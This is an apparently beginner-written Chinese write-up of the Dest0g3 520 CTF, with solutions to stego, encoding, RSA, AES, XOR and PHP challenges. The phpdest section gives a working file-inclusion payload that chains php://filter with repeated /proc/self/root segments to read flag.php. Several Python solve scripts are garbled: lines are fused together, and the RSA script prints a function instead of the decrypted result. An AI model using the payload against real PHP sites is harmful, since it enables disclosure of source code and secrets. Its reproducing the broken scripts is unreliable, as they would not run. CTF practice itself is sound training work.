Dest0g3 520迎新赛部分WP

  • 前言:
  • MISC:
    • Welcome to fxxking DestCTF:
    • Pngenius:
    • EasyEncode:
    • 你知道js嘛:
    • StrangeTraffic:
    • 4096:
    • Python_jail:
  • CRYPTO:
    • babyRSA:
    • abyAES:
  • REVERSE:
    • simpleXOR:
  • WEB:
    • phpdest:

前言:

由于刚接触CTF没多久 还是属于萌新级别的(中专高中生)也没怎么打过比赛记录一下学习的过程大佬绕过即可,后续会继续加油努力。

MISC:

Welcome to fxxking DestCTF:

hint:关注公众号并回复:Give me the fxxking flag

下载下来是一个没有后缀得png 文件 加个后缀 得到公众号 图片 扫一下 回复上面提示即可。

Dest0g3{W31c0m3_t0_DestCTF2022!}

Pngenius:


下载下来是一张图片,先放入WinHex中然后在文件尾部分发现了PK 头 (压缩包文件)改个后缀里面有个 flag.txt

需要密码 使用工具 Stegsolve 然后LSB一下 就可以看到压缩包密码了

Dest0g3{2908C1AA-B2C1-B8E6-89D1-21B97D778603}

EasyEncode:

下载下来是一个压缩包,里面的文件加密了使用工具Ziperello 得到密码:100861

打开里面是一串莫斯密码 进行解密 网站:https://www.ip138.com/mosi/


使用 unicode编码转换:http://www.esjson.com/unicodeEncode.html 得到一串base64解码得到FLAG


Dest0g3{Deoding_1s_e4sy_4_U}

你知道js嘛:

下载下来的文件放入kali 发现是一个文件夹 在word目录下发现了两个xml文件 其中一个文件中藏着三串base64编码 依次进行解码



Brainfuck:http://www.hiencode.com/brain.html


Dest0g3{86facac9-0a5d-4047-b702-86cb37ab77b2}

StrangeTraffic:

下载下来是个数据包 直接过滤TCP协议查看数据流 根据数据流进行分析 发现规律得到是base64编码 最终多次组合得到FLAG

4096:

打开靶机是一个4096的小游戏,直接F12查看网页源代码 直接搜索flag 找到一串bse64加密的字符串 解码后发现是flag的其中一部分




然后找到了一张很大的白色图片保存一下,使用foremost 分离一下 发现里面有个音频文件 还有个加密的压缩包文件

wav格式的 先使用Audacity 分析一下设置一下频普图仔细听了一下好像是电话号码 拨号的按键

接着放入kali中使用工具qsstv把音频放进去 得到了提示 电话号码加密的MD5值就是压缩密码


注意顺序 最后得到电话号码为:13879085947 进行MD5加密得到压缩吧解压密码


得到了一张打乱的图片 需要拼图 使用工具gaps 最后得到完整拼图 拼图中有一串base64编码 解码即可得到FLAG

gaps --image=flag.jpg --size=64 --save



需要尝试一下排列顺序最终得到:RGVzdDBnM3tlZDRkMTE0Zi05ZWU0LQ==

最后把前面获取到的FLAG 组合一下 得到:Dest0g3{ed4d114f-9ee4-4ee7-b673-971d81f8b177}

Python_jail:


打开第一个提示文件,很明显是零宽字节加密的所以要进行解密 : 提示我们要使用空白字符

0宽字节解密:https://www.mzy0.com/ctftools/zerowidth1/

另一个网站:http://330k.github.io/misc_tools/unicode_steganography.html

第二个文件就是空白字符的文本 需要解密 推荐这个网站:https://vii5ard.github.io/whitespace/



打开压缩包里面有张图片 在尝试对其进行LSB隐写查看 使用工具Stegsolve 得到一串base64编码进行解码最终得到FLAG


base64解码:http://www.jsons.cn/base64

flag{b5bcfc87-5ca6-43f1-b384-57d09b886ca9}

CRYPTO:

babyRSA:

from Crypto.Util.number import bytes_to_long, getPrime, long_to_bytes
import libnumq = 165143607013706756535226162768509114446233024193609895145003307138652758365886458917899911435630452642271040480670481691733000313754732183700991227511971005378010205097929462099354944574007393761811271098947894183507596772524174007304430976545608980195888302421142266401500880413925699125132100053801973969401
p = 165143607013706756535226162768509114446233024193609895145003307138652758365886458917899911435630452642271040480670481691733000313754732183700991227511971005378010205097929462099354944574007393761811271098947894183507596772524174007304430976545608980195888302421142266401500880413925699125132100053801973971467
n = 27272410937497615429184017335437367466288981498585803398561456300019447702001403165885200936510173980380489828828523983388730026101865884520679872671569532101708469344562155718974222196684544003071765625134489632331414011555536130289106822732544904502428727133498239161324625698270381715640332111381465813621908465311076678337695819124178638737015840941223342176563458181918865641701282965455705790456658431641632470787689389714643528968037519265144919465402561959014798324908010947632834281698638848683632113623788303921939908168450492197671761167009855312820364427648296494571794298105543758141065915257674305081267
c = 14181751948841206148995320731138166924841307246014981115736748934451763670304308496261846056687977917728671991049712129745906089287169170294259856601300717330153987080212591008738712344004443623518040786009771108879196701679833782022875324499201475522241396314392429412747392203809125245393462952461525539673218721341853515099201642769577031724762640317081252046606564108211626446676911167979492329012381654087618979631924439276786566078856385835786995011067720124277812004808431347148593882791476391944410064371926611180496847010107167486521927340045188960373155894717498700488982910217850877130989318706580155251854
e = 65537d = libnum.invmod(e, (p - 1) * (q - 1))
m = pow(c, d, n)
string = long_to_bytes
print(string)

abyAES:

from Crypto.Cipher import AES
from gmpy2 import*
from Crypto.Util.number import*enc_flag = b'C4:\x86Q$\xb0\xd1\x1b\xa9L\x00\xad\xa3\xff\x96 hJ\x1b~\x1c\xd1y\x87A\xfe0\xe2\xfb\xc7\xb7\x7f^\xc8\x9aP\xdaX\xc6\xdf\x17l=K\x95\xd07'
key = b'\xa4\xa6M\xab{\xf6\x97\x94>hK\x9bBe]F'
iv = b'\xd1\xdf\x8f)\x08w\xde\xf9yX%\xca[\xcb\x18\x80'
aes = AES.new(key,AES.MODE_CBC,iv)
flag = aes.decrypt(enc_flag)
print(flag)

REVERSE:

simpleXOR:

dword = [0xB3, 0x91, 0x82, 0x80, 0xC3, 0x9B, 0xCE, 0x75, 0xCF, 0x9C, 0x9A, 0x85, 0x85, 0xCD, 0xB8, 0x84, 0xAA, 0x7D, 0xBD, 0xBB, 0xB1, 0xB5, 0x96, 0x71, 0x8D, 0x9E, 0x86, 0xBF, 0x73, 0xA8, 0xA3, 0x9C, 0x83, 0x65, 0x9E, 0x57]
q = []
flag = ""v6 = 247
for i in dword:q.append(i ^ v6)for j in range(0, 36):flag += chr(q[j]-j)print(flag)

WEB:

phpdest:

<?php
highlight_file(__FILE__);
require_once 'flag.php';
if(isset($_GET['file'])) {require_once($_GET['file']);
}

文件包含漏洞 payload:

?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php


Dest0g3{10cbbff7-a535-45ae-84f1-76ebb8771bae}

Dest0g3 520迎新赛部分WP相关推荐

  1. 【Dest0g3 520迎新赛】密码学部分Wp及LCG(线性同余生成器)攻击方法

    题目出自Dest0g3 520迎新赛,知识点包括RSA.AES.DLP.LCG等. 文章目录 babyRSA babyAES ezDLP ezStream Mr.Doctor babyRSA 题目代码 ...

  2. Dest0g3 520迎新赛WEB 无java部分 wp

    Dest0g3 520迎新赛 只写了web,勉勉强强拿了总榜58名,web分榜11名这个尴尬的名次,前面的师傅太强了 phpdest <?php highlight_file(__FILE__) ...

  3. Dest0g3 520迎新赛webmisc

    目录 <1> Web (1) phpdest (2) EasyPHP (3) ezrce (4) funny_upload (5) easySSTL (6) ezzip <2> ...

  4. Dest0g3 520迎新赛 个人复现Writeup

    Dest0g3 520迎新赛 Dest0g3首次招新啦! Dest0g3 Team现逐步发展到各大高校及安全公司均有成员分布,在过去的半年里先后取得L3HCTF第十.SCTF第六及SUSCTF第四的优 ...

  5. Dest0g3 520迎新赛 writeup (misc部分 + web部分)

    Dest0g3 520迎新赛 文章目录 Dest0g3 520迎新赛 MISC Welcome to fxxking DestCTF 你知道js吗 StrangeTraffic Pngenius Ea ...

  6. # Dest0g3 520迎新赛(更新中)

    Dest0g3 520迎新赛 1.AI (1)OCR 下载发现是一个凌乱的图片 尝试使用010 Editor(这里为什么使用该编译器,因为改编译器会提示CRC错误) 这里发现CRC报错说明宽或高方面有 ...

  7. [Dest0g3 520迎新赛] Web部分wp

    phpdest 文件竞争 <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) {r ...

  8. Dest0g3 520迎新赛WP

    题目难度:萌新 一.Crypto_babyRSA_RSA私钥解密 题目脚本 from Crypto.Util.number import bytes_to_long, getPrime from gm ...

  9. [Dest0g3 520迎新赛] 不会的部分 The correct flag,emma,Bag

    终于在赛完N天后搜到一些不会的题--> 问谛居 目录 AI The correct flag pwn emma crypto Bag AI The correct flag 这个是脑子没想到,解 ...

  10. buuctf:Dest0g3 520迎新赛 web EasySSTI

    源码如下,过滤了不少,过滤不区分大小写: [ '\t', ' ', "'", '"', '_', 'getitem', 'request', 'popen', 'cook ...

最新文章

  1. 转载非原创:修改BB 的内容,回车后修改CC 的值
  2. Flash XSS 漏洞详解 根治的好办法
  3. java多线程 sleep()和wait()的区别
  4. J2me Canvas
  5. 011_html标题
  6. 遇到的JDBC的一个问题
  7. micropython按键控制流水灯_【micro:bit Micropython】The LED Display(1)控制像素点
  8. mysql 存储过程中limit
  9. 一套组合拳,打造一款 IDEA 护眼方案
  10. C#3.0 为我们带来什么(3) —— 初始化器
  11. Unity 5.x---00使用重力
  12. 在线计算机系统考试测试题,最新计算机考试题库及答案.docx
  13. linux系统可以在移动硬盘,如何在移动硬盘上装LINUX系统?
  14. python爬虫学习之路1
  15. Matlab进阶绘图第8期—聚类/分类散点图
  16. python小型登录系统_(Python)注册登录系统完整版
  17. 1MB,1GB,1TB等于多少字节或比特?(理解B与b的区别)
  18. 美国克莱姆森大学计算机专业排名,2014年美国研究生计算机专业排名
  19. 杨柳目-杨柳科:杨柳科
  20. 利用栈将递归转换为非递归的方法

热门文章

  1. 配置PLSQL连接ORACLE数据库
  2. 微信美团服务器异常怎么回事,美团行为存在异常怎么解决?美团账号异常怎么回事...
  3. REST-assured简介
  4. 封装系统(以封装Windows 7为例)
  5. Android获取SystemProperties方法
  6. 关于格林尼治时间(GMT)和DateTime相互转换的分享
  7. macbook历代_苹果笔记本的进化史 历代Macbook产品回顾
  8. 一个更高效的RACK机制
  9. C++基础知识 - 浮点类型
  10. 如果你要补充益生菌 ——益生菌补充、个体化、定植指南